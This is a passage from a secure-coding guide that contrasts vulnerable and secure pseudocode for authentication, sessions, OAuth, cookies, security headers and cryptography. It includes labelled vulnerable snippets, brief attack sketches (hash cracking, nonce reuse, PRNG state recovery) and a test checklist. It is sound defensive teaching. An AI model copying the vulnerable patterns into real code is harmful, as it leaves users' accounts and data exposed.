+ return success() + return error("Wrong password") + +// SECURE: Complete password reset implementation +function createResetToken_secure(userId): + // Generate cryptographically random token + token = generateSecureRandom(32) // 256 bits + tokenHash = sha256(token) // Store hash, not token + expiry = now() + (15 * 60) // 15 minutes + + // Invalidate any existing reset tokens + deleteResetTokensForUser(userId) + + // Store hashed token + saveResetToken(userId, tokenHash, expiry) + + // Return plaintext token for email (store hash only) + return token + +function resetPassword_secure(token, newPassword): + tokenHash = sha256(token) + resetRecord = getResetTokenByHash(tokenHash) + + if not resetRecord: + return error("Invalid token") + + if resetRecord.expiry < now(): + deleteResetToken(tokenHash) + return error("Token expired") + + if resetRecord.used: + return error("Token already used") + + // Validate new password strength + validation = validatePasswordStrength(newPassword) + if not validation.valid: + return error(validation.errors) + + user = findUserById(resetRecord.userId) + + // Update password + user.hashedPassword = hashPassword(newPassword) + user.passwordChangedAt = now() + user.save() + + // Mark token as used (or delete) + resetRecord.used = true + resetRecord.save() + + // Invalidate all existing sessions + invalidateAllSessionsForUser(user.id) + + // Invalidate all refresh tokens + revokeAllRefreshTokensForUser(user.id) + + // Send notification email + sendPasswordChangedNotification(user.email) + + return success() +``` + +--- + +### Edge Case 4: OAuth State Parameter Issues + +```pseudocode +// VULNERABLE: No state parameter - CSRF possible +function initiateOAuth_vulnerable(): + redirectUrl = OAUTH_PROVIDER_URL + + "?client_id=" + CLIENT_ID + + "&redirect_uri=" + CALLBACK_URL + + "&scope=email profile" + return redirect(redirectUrl) + +// VULNERABLE: Predictable state +function initiateOAuth_weakState(): + state = toString(now()) // Predictable! 
+ storeState(state) + redirectUrl = OAUTH_PROVIDER_URL + + "?client_id=" + CLIENT_ID + + "&state=" + state + + "&redirect_uri=" + CALLBACK_URL + return redirect(redirectUrl) + +// VULNERABLE: State not validated on callback +function handleCallback_vulnerable(request): + code = request.query.code + // state parameter ignored! + tokens = exchangeCodeForTokens(code) + return loginWithTokens(tokens) + +// VULNERABLE: State reuse possible +function handleCallback_reuseVulnerable(request): + code = request.query.code + state = request.query.state + + if isValidState(state): // Just checks if it exists + // Doesn't delete/invalidate state after use + tokens = exchangeCodeForTokens(code) + return loginWithTokens(tokens) + + return error("Invalid state") + +// SECURE: Complete OAuth implementation +function initiateOAuth_secure(request): + // Generate random state + state = generateSecureRandom(32) + + // Bind state to user's session (CSRF protection) + request.session.oauthState = state + request.session.oauthStateCreatedAt = now() + + // Optional: include nonce for ID token validation + nonce = generateSecureRandom(32) + request.session.oauthNonce = nonce + + redirectUrl = OAUTH_PROVIDER_URL + + "?client_id=" + CLIENT_ID + + "&response_type=code" + + "&redirect_uri=" + encodeURIComponent(CALLBACK_URL) + + "&scope=" + encodeURIComponent("openid email profile") + + "&state=" + state + + "&nonce=" + nonce + + return redirect(redirectUrl) + +function handleCallback_secure(request): + code = request.query.code + state = request.query.state + error = request.query.error + + // Check for OAuth error + if error: + logOAuthError(error, request.query.error_description) + return redirect("/login?error=oauth_failed") + + // Validate state + if not state: + return error("Missing state parameter") + + storedState = request.session.oauthState + stateCreatedAt = request.session.oauthStateCreatedAt + + // Constant-time comparison + if not constantTimeEquals(state, storedState): + 
logSecurityEvent("OAuth state mismatch", request) + return error("Invalid state") + + // Check state expiry (5 minutes) + if now() - stateCreatedAt > 300: + return error("OAuth session expired") + + // Clear state immediately (one-time use) + delete request.session.oauthState + delete request.session.oauthStateCreatedAt + + // Exchange code for tokens + tokenResponse = await exchangeCodeForTokens(code, CALLBACK_URL) + + if not tokenResponse.id_token: + return error("Missing ID token") + + // Validate ID token + idToken = verifyIdToken(tokenResponse.id_token, { + audience: CLIENT_ID, + nonce: request.session.oauthNonce // Verify nonce + }) + + delete request.session.oauthNonce + + if not idToken.valid: + return error("Invalid ID token") + + // Create or update user + user = findOrCreateUserFromOAuth(idToken.payload) + + // Create session with new session ID + createAuthenticatedSession(request, user) + + return redirect("/dashboard") +``` + +--- + +## Common Mistakes Section + +### Common Mistake 1: Checking User ID from Token Payload Without Verification + +```pseudocode +// VULNERABLE: Trusting unverified token payload +function getUserFromToken_vulnerable(token): + // Decodes token WITHOUT verification + decoded = base64Decode(token.split(".")[1]) + payload = JSON.parse(decoded) + + // Trusting the user ID from unverified payload! + return findUserById(payload.sub) + +// VULNERABLE: Verifying signature but using wrong data source +function getUser_vulnerable(request): + token = request.headers.authorization.replace("Bearer ", "") + + // Verify the token (good) + isValid = jwt.verify(token, secret) + + if isValid: + // But then extract user from request body (bad!) 
+ userId = request.body.userId + return findUserById(userId) + +// SECURE: Always use verified payload +function getUserFromToken_secure(token): + try: + // Verify and decode in one operation + decoded = jwt.verify(token, secret, { algorithms: ["HS256"] }) + + // Use the verified payload, not a separate data source + return findUserById(decoded.sub) + catch: + return null + +// SECURE: Middleware that sets verified user +function authMiddleware(request, next): + token = extractTokenFromRequest(request) + + if not token: + return unauthorized() + + try: + verified = jwt.verify(token, secret, { + algorithms: ["HS256"], + issuer: "myapp" + }) + + // Set user from VERIFIED token only + request.user = { + id: verified.sub, + email: verified.email, + role: verified.role + } + + return next() + catch: + return unauthorized() +``` + +--- + +### Common Mistake 2: Not Invalidating Old Sessions + +```pseudocode +// VULNERABLE: Password change doesn't invalidate sessions +function changePassword_vulnerable(request, oldPassword, newPassword): + user = request.user + + if verifyPassword(oldPassword, user.hashedPassword): + user.hashedPassword = hashPassword(newPassword) + user.save() + return success("Password changed") + + return error("Wrong password") + // Existing sessions remain valid! Attacker still logged in + +// VULNERABLE: Role change doesn't update session +function demoteUser_vulnerable(userId): + user = findUserById(userId) + user.role = "basic" + user.save() + // User's existing sessions still have old role! 
+ return success() + +// SECURE: Invalidate sessions on security-sensitive changes +function changePassword_secure(request, oldPassword, newPassword): + user = request.user + + if not verifyPassword(oldPassword, user.hashedPassword): + return error("Wrong password") + + // Update password + user.hashedPassword = hashPassword(newPassword) + user.passwordChangedAt = now() + user.save() + + // Invalidate ALL sessions except current (or including current) + currentSessionId = request.session.id + sessions = getAllSessionsForUser(user.id) + + for session in sessions: + if session.id != currentSessionId: // Keep current or invalidate all + deleteSession(session.id) + + // Revoke all refresh tokens + revokeAllRefreshTokensForUser(user.id) + + // Optional: Force re-authentication + regenerateSession(request) + + return success("Password changed. Other sessions logged out.") + +// SECURE: Track password change timestamp in tokens +function validateToken_withPasswordCheck(token): + decoded = jwt.verify(token, secret) + + user = findUserById(decoded.sub) + + // Check if token was issued before password change + if decoded.iat < user.passwordChangedAt: + return { valid: false, error: "Password changed since token issued" } + + return { valid: true, payload: decoded } +``` + +--- + +### Common Mistake 3: SameSite Cookie Misunderstanding + +```pseudocode +// VULNERABLE: Using Lax when Strict is needed +function setSessionCookie_wrongSameSite(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true, + sameSite: "Lax" // Allows cookie on top-level navigation + // Attacker can CSRF via: + }) + +// VULNERABLE: Omitting SameSite (defaults vary by browser) +function setSessionCookie_noSameSite(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true + // SameSite not specified - browser-dependent behavior + }) + +// VULNERABLE: Using None without understanding implications +function 
setSessionCookie_sameNone(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true, + sameSite: "None" // Sent on ALL cross-site requests - CSRF vulnerable! + }) + +// GUIDE: When to use each SameSite value + +// STRICT: Most secure, use for sensitive auth cookies +// - Cookie NOT sent on any cross-site request +// - A user following a link from email or another site arrives without the cookie (appears logged out) +// - Best for: Banking, admin panels, security-critical apps +function setStrictCookie(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true, + sameSite: "Strict" + }) + +// LAX: Balance of security and usability +// - Cookie sent on top-level GET navigation (clicking links) +// - NOT sent on cross-site POST, images, iframes +// - Good for: General user sessions where link-sharing matters +// - STILL NEED CSRF tokens for POST/PUT/DELETE endpoints! +function setLaxCookie(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, + secure: true, + sameSite: "Lax" + }) + // Additional CSRF protection still recommended + +// NONE: Only for cross-site embedding needs +// - Cookie sent on ALL requests including cross-site +// - REQUIRES Secure attribute (HTTPS only) +// - Only use for: OAuth flows, embedded widgets, intentional cross-site +function setNoneCookie_onlyWhenNeeded(response, oauthToken): + response.setCookie("oauth_continuation", oauthToken, { + httpOnly: true, + secure: true, // REQUIRED with SameSite=None + sameSite: "None", + maxAge: 300 // Short-lived for specific purpose + }) +``` + +--- + +## Security Header Configurations + +```pseudocode +// SECURE: Complete security headers for authentication +function setSecurityHeaders(response): + // Prevent clickjacking (don't allow embedding in frames) + response.setHeader("X-Frame-Options", "DENY") + + // Modern clickjacking protection + response.setHeader("Content-Security-Policy", + "default-src 'self'; " + 
"script-src 'self'; " + + "style-src 'self' 'unsafe-inline'; " + + "frame-ancestors 'none'; " + + "form-action 'self'" + ) + + // Prevent MIME type sniffing + response.setHeader("X-Content-Type-Options", "nosniff") + + // Disable the legacy browser XSS auditor (removed from modern browsers; rely on CSP) + response.setHeader("X-XSS-Protection", "0") + + // Enforce HTTPS on future requests (HSTS) + response.setHeader("Strict-Transport-Security", + "max-age=31536000; includeSubDomains; preload" + ) + + // Control referrer information + response.setHeader("Referrer-Policy", "strict-origin-when-cross-origin") + + // Disable sensitive browser features via Permissions-Policy + response.setHeader("Permissions-Policy", + "geolocation=(), camera=(), microphone=(), payment=()" + ) + + // Cache control for authenticated pages + response.setHeader("Cache-Control", + "no-store, no-cache, must-revalidate, private" + ) + response.setHeader("Pragma", "no-cache") + response.setHeader("Expires", "0") + +// SECURE: Login page specific headers +function setLoginPageHeaders(response): + setSecurityHeaders(response) + + // Additional login protection + response.setHeader("Content-Security-Policy", + "default-src 'self'; " + + "script-src 'self'; " + + "style-src 'self'; " + + "form-action 'self'; " + // Forms only submit to same origin + "frame-ancestors 'none'; " + // Prevent clickjacking + "base-uri 'self'" // Prevent base tag injection + ) + +// SECURE: API endpoint headers +function setApiHeaders(response): + // API responses shouldn't be cached + response.setHeader("Cache-Control", "no-store") + + // Prevent MIME type sniffing + response.setHeader("X-Content-Type-Options", "nosniff") + + // CORS configuration (adjust based on needs) + response.setHeader("Access-Control-Allow-Origin", + getAllowedOrigin()) // Not "*" for authenticated APIs! 
+ response.setHeader("Access-Control-Allow-Credentials", "true") + response.setHeader("Access-Control-Allow-Methods", + "GET, POST, PUT, DELETE, OPTIONS") + response.setHeader("Access-Control-Allow-Headers", + "Content-Type, Authorization") +``` + +--- + +## Detection Hints: How to Spot Authentication Issues + +### Code Review Patterns + +```pseudocode +// RED FLAGS in authentication code: + +// 1. Missing algorithm specification in JWT verification +jwt.verify(token, secret) // BAD - should specify algorithms +jwt.decode(token) // BAD - decode doesn't verify! + +// 2. Session not regenerated after login +request.session.userId = user.id // Search for: session assignment without regenerate + +// 3. Tokens in localStorage +localStorage.setItem("token" // Search for: localStorage.*token + +// 4. No HttpOnly on session cookies +setCookie("session", id) // Search for: setCookie without httpOnly + +// 5. Weak secrets +JWT_SECRET = "secret" // Search for: SECRET.*=.*["'] + +// 6. No expiration +jwt.sign(payload, secret) // Without expiresIn + +// 7. Password comparison without constant-time +if password == storedHash // Direct comparison + +// 8. No rate limiting on login +function login(email, password) // Check for rate limit before auth logic + +// GREP patterns for security review: +// localStorage\.setItem.*token +// sessionStorage\.setItem.*token +// jwt\.decode\s*\( +// jwt\.verify\s*\([^,]+,[^,]+\s*\) (missing options) +// sameSite.*None +// password.*== +// \.secret\s*=\s*["'] +``` + +### Security Testing Checklist + +```pseudocode +// Authentication security test cases: + +// 1. Token manipulation tests +- [ ] Change JWT algorithm to "none" and remove signature +- [ ] Modify JWT payload (role, user ID) and check if accepted +- [ ] Use expired token +- [ ] Use token with wrong issuer/audience + +// 2. 
Session tests +- [ ] Check if session ID changes after login +- [ ] Attempt session fixation (set session ID before login) +- [ ] Check session timeout enforcement +- [ ] Verify logout actually invalidates session + +// 3. Password tests +- [ ] Test common passwords (password123, qwerty, etc.) +- [ ] Test password length limits (very long passwords) +- [ ] Check password reset token predictability +- [ ] Verify password reset invalidates old tokens + +// 4. Cookie tests +- [ ] Check HttpOnly flag on session cookies +- [ ] Check Secure flag on session cookies +- [ ] Test SameSite enforcement +- [ ] Verify cookie scope (path, domain) + +// 5. Rate limiting tests +- [ ] Attempt rapid login failures +- [ ] Check for account lockout +- [ ] Test rate limit bypass (different IPs, headers) + +// 6. OAuth tests +- [ ] Test with missing state parameter +- [ ] Test with reused state parameter +- [ ] Check redirect_uri validation +``` + +--- + +## Security Checklist + +- [ ] Passwords validated against common password list and breach databases +- [ ] Password hashing uses bcrypt, argon2, or scrypt with appropriate work factor +- [ ] Session IDs generated with cryptographically secure random +- [ ] Session regenerated after authentication and privilege changes +- [ ] JWT algorithm explicitly specified (not derived from token) +- [ ] JWT "none" algorithm explicitly rejected +- [ ] JWT secrets are strong (256+ bits) and stored securely +- [ ] JWT expiration is short for access tokens (15-30 minutes) +- [ ] Refresh token rotation implemented +- [ ] Tokens can be revoked server-side (blacklist or session binding) +- [ ] Authentication cookies have HttpOnly, Secure, and appropriate SameSite +- [ ] Tokens stored in HttpOnly cookies, not localStorage/sessionStorage +- [ ] Rate limiting implemented on login endpoints +- [ ] Account lockout after repeated failures +- [ ] Constant-time comparison used for password/token verification +- [ ] Password reset tokens are cryptographically 
random and single-use +- [ ] Password change invalidates existing sessions +- [ ] OAuth state parameter is random and validated +- [ ] Security headers configured (HSTS, CSP, X-Frame-Options, etc.) +- [ ] Logout invalidates session/tokens server-side +- [ ] "Logout from all devices" functionality available + +--- + +# Pattern 5: Cryptographic Failures + +**CWE References:** CWE-327 (Use of a Broken or Risky Cryptographic Algorithm), CWE-328 (Reversible One-Way Hash), CWE-329 (Not Using a Random IV with CBC Mode), CWE-330 (Use of Insufficiently Random Values), CWE-331 (Insufficient Entropy), CWE-338 (Use of Cryptographically Weak PRNG), CWE-916 (Use of Password Hash With Insufficient Computational Effort) + +**Priority Score:** 18-20 (Frequency: 7, Severity: 9, Detectability: 4-6) + +--- + +## Introduction: Crypto is Hard—AI Often Copies Deprecated Patterns + +Cryptographic implementations represent one of the most perilous areas in security-sensitive code. AI models are particularly prone to generating insecure cryptographic patterns due to several compounding factors: + +**Why AI Models Generate Weak Cryptography:** + +1. **Training Data Time Lag:** Cryptographic best practices evolve continuously. Training data contains years of outdated tutorials, Stack Overflow answers, and documentation recommending algorithms now considered broken (MD5, SHA1, DES, RC4). AI models cannot distinguish between "worked in 2015" and "secure in 2025." + +2. **Tutorial Simplification:** Educational materials often use simplified crypto examples to teach concepts—MD5 for demonstration, short keys for readability, static IVs for reproducibility. AI learns these "teaching patterns" as valid implementations. + +3. **Copy-Paste Prevalence:** Cryptographic code is frequently copied rather than understood. Training data reflects this—the same insecure patterns appear thousands of times across repositories, reinforcing incorrect approaches. + +4. 
**API Complexity Hides Danger:** Modern cryptographic libraries have complex APIs where default parameters may be insecure. AI generates code that "works" by using defaults without understanding that those defaults may select an unauthenticated, pattern-leaking mode (ECB) or use weak key derivation. + +5. **Security vs. Convenience Trade-offs:** AI models optimize for code that compiles and runs. Cryptographic security often requires additional steps (proper IV generation, authenticated modes, key derivation) that AI omits for simplicity. + +6. **Cross-Language Confusion:** Cryptographic APIs vary dramatically between languages. AI conflates patterns from different ecosystems, generating hybrid code that may compile but violates security assumptions of both libraries. + +**Impact Statistics:** + +- **29%** of data breaches involve cryptographic failures (Verizon DBIR 2024) +- "Cryptographic Failures" ranks **#2** (A02) in the OWASP Top 10 2021 +- **62%** of AI-generated code samples use MD5 or SHA1 for password hashing (Security research 2024) +- Cost of a breach due to weak encryption: **$4.8 million** average (IBM Cost of a Data Breach 2024) +- **40%** of applications still use broken cryptographic algorithms in production (Veracode State of Software Security) + +--- + +## BAD Examples: Multiple Manifestations + +### BAD Example 1: MD5/SHA1 for Password Hashing + +```pseudocode +// VULNERABLE: MD5 for password hashing +function hashPassword(password): + return md5(password) + +// VULNERABLE: SHA1 for password storage +function storePassword(userId, password): + hashedPassword = sha1(password) + database.update("users", userId, {"password": hashedPassword}) + +// VULNERABLE: Single-round SHA256 (still too fast) +function createPasswordHash(password): + return sha256(password) + +// VULNERABLE: Unsalted hash +function verifyPassword(inputPassword, storedHash): + return sha256(inputPassword) == storedHash + +// VULNERABLE: Simple salt without proper KDF +function 
hashWithSalt(password, salt): + return sha256(salt + password) + +// VULNERABLE: MD5 with salt (still MD5) +function improvedHash(password): + salt = generateRandomBytes(16) + hash = md5(salt + password) + return salt + ":" + hash +``` + +**Why This Is Dangerous:** +- MD5 produces collisions in seconds on modern hardware +- SHA1 collision attacks are practical (SHAttered attack, 2017) +- Even SHA256 is too fast for password hashing: GPUs compute billions of hashes per second +- Unsalted hashes enable rainbow table attacks +- A salted single-round hash (salt + password) defeats rainbow tables but is still fast enough to brute-force +- Password cracking rigs can test 180 billion MD5 hashes per second + +**Attack Scenario:** +```pseudocode +// Attacker steals database with MD5 password hashes +// Using hashcat on modern GPU: + +hashcat_speed = 180_000_000_000 // 180 billion MD5/second +common_passwords = 1_000_000_000 // 1 billion common passwords + +time_to_crack_all = common_passwords / hashcat_speed +// Result: ~0.0056 seconds (about 5.6 ms) to hash ALL common passwords; +// with unsalted hashes, that single pass checks ALL stolen hashes at once + +// Even SHA256 is fast: +sha256_speed = 23_000_000_000 // 23 billion SHA256/second +// The same billion-password list still takes only ~0.04 seconds +``` + +--- + +### BAD Example 2: ECB Mode Encryption + +```pseudocode +// VULNERABLE: ECB mode reveals patterns +function encryptData(plaintext, key): + cipher = createCipher("AES", key, mode = "ECB") + return cipher.encrypt(plaintext) + +// VULNERABLE: Default mode may be ECB in some libraries +function simpleEncrypt(data, key): + cipher = AES.new(key) // Some libraries default to ECB! 
+ return cipher.encrypt(padData(data)) + +// VULNERABLE: Explicit ECB for "simplicity" +function encryptUserData(userData, encryptionKey): + algorithm = "AES/ECB/PKCS5Padding" // Java-style + cipher = Cipher.getInstance(algorithm) + cipher.init(ENCRYPT_MODE, encryptionKey) + return cipher.doFinal(userData) + +// VULNERABLE: Assuming any AES is secure +function protectSensitiveData(data, key): + // "AES is strong encryption" - but ECB mode is not + encryptor = AESEncryptor(key, mode = "ECB") + return encryptor.encrypt(data) +``` + +**Why This Is Dangerous:** +- ECB encrypts identical plaintext blocks to identical ciphertext blocks +- Patterns in plaintext are preserved in ciphertext +- Famous example: ECB-encrypted images show the original image outline +- No semantic security—attacker learns information about plaintext structure +- Block manipulation attacks possible (swap, delete, duplicate blocks) + +**Visual Demonstration:** +```pseudocode +// Original image (bitmap of a penguin): +// ████████████████ +// ██ ████ ██ +// ██ ██████ ██ +// ██████████████ +// ████ ████████ +// ████████████████ + +// After ECB encryption: +// ???????????????? ← Still shows penguin shape! +// ?? ???? ?? ← Identical colors → identical ciphertext +// ?? ?????? ?? +// ?????????????? +// ???? ???????? +// ???????????????? + +// After CBC/GCM encryption: +// ???????????????? ← Random appearance +// ???????????????? ← No pattern visible +// ???????????????? +// ???????????????? +// ???????????????? +// ???????????????? 
+``` + +--- + +### BAD Example 3: Static IVs / Nonces + +```pseudocode +// VULNERABLE: Hardcoded IV +STATIC_IV = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) + +function encryptMessage(plaintext, key): + cipher = AES.new(key, AES.MODE_CBC, iv = STATIC_IV) + return cipher.encrypt(padData(plaintext)) + +// VULNERABLE: Same IV for all encryptions +class Encryptor: + IV = generateRandomBytes(16) // Generated ONCE at startup + + function encrypt(data, key): + cipher = createCipher("AES-CBC", key, this.IV) + return cipher.encrypt(data) + +// VULNERABLE: Predictable IV (counter without random start) +nonce_counter = 0 +function encryptWithNonce(plaintext, key): + nonce_counter = nonce_counter + 1 + nonce = intToBytes(nonce_counter, 12) // Predictable! + return AES_GCM_encrypt(key, nonce, plaintext) + +// VULNERABLE: IV derived from predictable data +function encryptRecord(userId, data, key): + iv = sha256(toString(userId))[:16] // Same IV for same user! + return AES_CBC_encrypt(key, iv, data) + +// VULNERABLE: Timestamp-based IV +function timeBasedEncrypt(data, key): + iv = sha256(toString(getCurrentTimestamp()))[:16] + return AES_CBC_encrypt(key, iv, data) + // Problem: Collisions if encrypted in same second +``` + +**Why This Is Dangerous:** +- Same IV + same key = identical ciphertext for identical plaintext (breaks semantic security) +- In CBC mode: enables plaintext recovery through XOR analysis across messages +- In CTR mode: key stream reuse → XOR of plaintexts recoverable +- In GCM mode: nonce reuse is catastrophic—key recovery possible +- Predictable IVs enable chosen-plaintext attacks + +**GCM Nonce Reuse Attack:** +```pseudocode +// If same nonce used twice with same key in GCM: +// Message 1: plaintext1, ciphertext1, tag1 +// Message 2: plaintext2, ciphertext2, tag2 + +// Attacker can compute: +// - XOR of plaintext1 and plaintext2 +// - Eventually recover the authentication key H +// - Forge arbitrary messages with valid tags + +// This is a 
CATASTROPHIC failure of GCM mode +// "Nonce misuse resistance" modes exist (GCM-SIV) for this reason +``` + +--- + +### BAD Example 4: Math.random() for Security + +```pseudocode +// VULNERABLE: Math.random for token generation +function generateResetToken(): + token = "" + for i in range(32): + token = token + toString(floor(random() * 16), base = 16) + return token + +// VULNERABLE: Math.random for session ID +function createSessionId(): + return "session_" + toString(random() * 1000000000) + +// VULNERABLE: Seeded random with predictable seed +function generateApiKey(userId): + setSeed(userId * getCurrentTimestamp()) + key = "" + for i in range(32): + key = key + randomChoice(ALPHANUMERIC_CHARS) + return key + +// VULNERABLE: Using non-crypto random for encryption IV +function quickEncrypt(data, key): + iv = [] + for i in range(16): + iv.append(floor(random() * 256)) + return AES_CBC_encrypt(key, iv, data) + +// VULNERABLE: JavaScript Math.random() is NOT cryptographic +function generateToken(): + return btoa(String.fromCharCode.apply(null, + Array.from({length: 32}, () => Math.floor(Math.random() * 256)) + )) +``` + +**Why This Is Dangerous:** +- Math.random() is backed by a non-cryptographic pseudo-random number generator (PRNG) +- Internal state can be recovered from a small number of observed outputs (V8's xorshift128+ has only 128 bits of state; truncated outputs need more samples) +- Once state is known, all past and future values are predictable +- Session tokens, API keys, and reset tokens become guessable +- Many PRNG implementations have short periods or weak seeding + +**State Recovery Attack:** +```pseudocode +// Attacker collects multiple password reset tokens +tokens_observed = [ + "a3f7c2e9b1d4...", // Token 1 + "8e2a5f1c9b3d...", // Token 2 + // ... 
collect ~30-50 tokens +] + +// Using z3 SMT solver or custom reversing: +function recoverMathRandomState(observed_outputs): + // V8's xorshift128+ can be reversed + // Once state recovered, predict next token + state = reverseEngineerState(observed_outputs) + next_token = predictNextOutput(state) + return next_token + +// Attacker generates password reset for victim +// Then predicts the token value +// Completes password reset without email access +``` + +--- + +### BAD Example 5: Hardcoded Symmetric Keys + +```pseudocode +// VULNERABLE: Key in source code +ENCRYPTION_KEY = "MySecretKey12345" + +function encryptUserData(data): + return AES_encrypt(ENCRYPTION_KEY, data) + +// VULNERABLE: Key derived from application constant +function getEncryptionKey(): + return sha256(APPLICATION_NAME + ENVIRONMENT + "secret") + +// VULNERABLE: Same key for all users +MASTER_KEY = bytes.fromhex("0123456789abcdef0123456789abcdef") + +function encryptForUser(userId, data): + return AES_encrypt(MASTER_KEY, data) + +// VULNERABLE: Key in configuration file (committed to git) +// config.py: +CRYPTO_CONFIG = { + "encryption_key": "dGhpcyBpcyBhIHNlY3JldCBrZXk=", // Base64 encoded + "hmac_key": "another_secret_key_here" +} + +// VULNERABLE: Weak key (too short) +function quickEncrypt(data): + key = "short" // 5 bytes, not 16/24/32 + return AES_encrypt(pad(key, 16), data) // Padded with zeros! 
+``` + +**Why This Is Dangerous:** +- Keys in source code are exposed in version control history forever +- Hardcoded keys cannot be rotated without code deployment +- Compilation/decompilation exposes keys in binaries +- Single key compromise affects all encrypted data +- Weak/short keys can be brute-forced +- Key derivation from predictable inputs allows reconstruction + +--- + +### BAD Example 6: Weak Key Derivation + +```pseudocode +// VULNERABLE: Direct use of password as key +function deriveKey(password): + return password.encode()[:32] // Truncate or pad to key size + +// VULNERABLE: Simple hash as key derivation +function passwordToKey(password): + return sha256(password) // Single round, no salt + +// VULNERABLE: MD5-based key derivation +function getKeyFromPassword(password, salt): + return md5(password + salt) + +// VULNERABLE: Insufficient iterations +function deriveKeyPBKDF2(password, salt): + return PBKDF2(password, salt, iterations = 1000) + // 2025 recommendation: minimum 600,000 for SHA256 + +// VULNERABLE: Using key derivation output directly for multiple purposes +function setupCrypto(password, salt): + derived = PBKDF2(password, salt, iterations = 100000, keyLength = 64) + encryptionKey = derived[:32] // First half + hmacKey = derived[32:] // Second half + // Problem: related keys, should use separate derivations + +// VULNERABLE: Weak salt (too short, predictable, or reused) +function deriveKeyWithWeakSalt(password): + salt = "salt" // Static salt defeats purpose + return PBKDF2(password, salt, iterations = 100000) +``` + +**Why This Is Dangerous:** +- Direct password use gives attackers dictionary attack advantage +- Single-hash derivation enables GPU-accelerated brute force +- Low iteration counts make PBKDF2/bcrypt fast to attack +- MD5 key derivation inherits all MD5 weaknesses +- Static/weak salt enables precomputation attacks +- Related key derivation can expose cryptographic weaknesses + +**Iteration Count Guidance (2025):** 
+```pseudocode +// PBKDF2-SHA256 minimum iterations by use case: +// - Interactive login (100ms budget): 600,000 iterations +// - Background/async (1s budget): 2,000,000 iterations +// - High-security (offline storage): 10,000,000 iterations + +// bcrypt cost factor: +// - Minimum 2025: cost = 12 (about 250ms) +// - Recommended: cost = 13-14 +// - High-security: cost = 15+ + +// Argon2id parameters (2025): +// - Memory: 64 MB minimum, 256 MB recommended +// - Iterations: 3 minimum +// - Parallelism: match available cores +// - Argon2id recommended over Argon2i or Argon2d +``` + +--- + +## GOOD Examples: Secure Cryptographic Patterns + +### GOOD Example 1: Proper Password Hashing with bcrypt/Argon2 + +```pseudocode +// SECURE: bcrypt with appropriate cost factor +function hashPassword(password): + // Cost factor 12 = ~250ms on modern hardware + // Increase cost factor annually as hardware improves + cost = 12 + return bcrypt.hash(password, cost) + +function verifyPassword(password, storedHash): + // bcrypt.verify handles timing-safe comparison internally + return bcrypt.verify(password, storedHash) + +// SECURE: Argon2id (recommended for new applications) +function hashPasswordArgon2(password): + // Argon2id: hybrid resistant to both side-channel and GPU attacks + options = { + type: ARGON2ID, + memoryCost: 65536, // 64 MB + timeCost: 3, // 3 iterations + parallelism: 4, // 4 parallel threads + hashLength: 32 // 256-bit output + } + return argon2.hash(password, options) + +function verifyPasswordArgon2(password, storedHash): + return argon2.verify(storedHash, password) + +// SECURE: scrypt for memory-hard hashing +function hashPasswordScrypt(password): + // N = CPU/memory cost (power of 2) + // r = block size + // p = parallelization parameter + salt = generateSecureRandom(16) + hash = scrypt(password, salt, N = 2^17, r = 8, p = 1, keyLen = 32) + return encodeSaltAndHash(salt, hash) + +// SECURE: Migrating from weak to strong hashing +function 
upgradePasswordHash(userId, password, currentHash): + // Verify against old hash + if legacyVerify(password, currentHash): + // Re-hash with modern algorithm + newHash = hashPasswordArgon2(password) + database.update("users", userId, {"password_hash": newHash}) + return true + return false +``` + +**Why This Is Secure:** +- bcrypt/argon2/scrypt are deliberately slow; Argon2 and scrypt are also memory-hard +- bcrypt and Argon2 libraries generate the salt and store it inside the hash string +- Timing-safe comparison built into verify functions +- Configurable work factors allow future-proofing +- Argon2id is resistant to both GPU attacks and side-channel attacks + +--- + +### GOOD Example 2: Authenticated Encryption (GCM Mode) + +```pseudocode +// SECURE: AES-256-GCM with proper nonce handling +function encryptAESGCM(plaintext, key): + // Generate cryptographically random 96-bit nonce + nonce = generateSecureRandom(12) + + cipher = createCipher("AES-256-GCM", key) + cipher.setNonce(nonce) + + // Optional: Add authenticated additional data (AAD) + // AAD is authenticated but NOT encrypted + aad = "context:user_data:v1" + cipher.setAAD(aad) + + ciphertext = cipher.encrypt(plaintext) + authTag = cipher.getAuthTag() // 128-bit tag + + // Return nonce + tag + ciphertext (all needed for decryption) + return nonce + authTag + ciphertext + +function decryptAESGCM(encryptedData, key): + // Extract components + nonce = encryptedData[:12] + authTag = encryptedData[12:28] + ciphertext = encryptedData[28:] + + cipher = createCipher("AES-256-GCM", key) + cipher.setNonce(nonce) + cipher.setAAD("context:user_data:v1") // Must match encryption + cipher.setAuthTag(authTag) + + try: + plaintext = cipher.decrypt(ciphertext) + return plaintext + catch AuthenticationError: + // Tag verification failed - data tampered or wrong key + log.warn("Decryption authentication failed - possible tampering") + return null + +// SECURE: XChaCha20-Poly1305 (extended nonce variant) +function encryptXChaCha(plaintext, key): + // 192-bit nonce - safe for random generation + 
nonce = generateSecureRandom(24) + + ciphertext, tag = xchachapoly.encrypt(key, nonce, plaintext) + + return nonce + tag + ciphertext +``` + +**Why This Is Secure:** +- GCM provides both confidentiality AND integrity +- Authentication tag detects any tampering +- 96-bit nonces are safe for random generation up to ~2^32 messages per key +- XChaCha20 has 192-bit nonce, safe for effectively unlimited messages +- AAD allows binding ciphertext to context (prevents cross-context attacks) + +--- + +### GOOD Example 3: Proper IV/Nonce Generation + +```pseudocode +// SECURE: Random IV for CBC mode +function encryptCBC(plaintext, key): + // 128-bit random IV for AES + iv = generateSecureRandom(16) + + cipher = createCipher("AES-256-CBC", key) + ciphertext = cipher.encrypt(plaintext, iv) + + // Prepend IV to ciphertext (IV doesn't need to be secret) + return iv + ciphertext + +function decryptCBC(encryptedData, key): + iv = encryptedData[:16] + ciphertext = encryptedData[16:] + + cipher = createCipher("AES-256-CBC", key) + return cipher.decrypt(ciphertext, iv) + +// SECURE: Counter-based nonce with random prefix (for GCM) +class SecureNonceGenerator: + // Random 32-bit prefix + 64-bit counter + // Safe for 2^64 messages with same key + + function __init__(): + this.prefix = generateSecureRandom(4) // 32-bit random + this.counter = 0 + this.lock = Mutex() + + function generate(): + this.lock.acquire() + this.counter = this.counter + 1 + if this.counter >= 2^64: + throw Error("Nonce 